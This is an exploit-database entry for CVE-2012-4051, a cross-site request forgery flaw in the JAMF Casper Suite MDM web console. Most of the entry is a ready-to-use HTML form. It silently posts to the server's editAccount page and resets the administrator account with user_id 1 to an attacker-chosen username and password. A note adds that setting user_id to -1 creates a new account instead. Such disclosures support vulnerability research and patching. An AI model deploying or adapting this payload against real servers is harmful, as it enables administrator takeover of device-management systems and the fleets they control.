JAMF Casper Suite MDM CSRF Vulnerability

ID 1337DAY-ID-19487
Type zdt
Reporter Jacob Holcomb
Modified 2012-09-27T00:00:00


Exploit for jsp platform in category web applications

                                            CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 
<title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title>
<form name="csrf"
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.

#  0day.today [2018-02-06]  #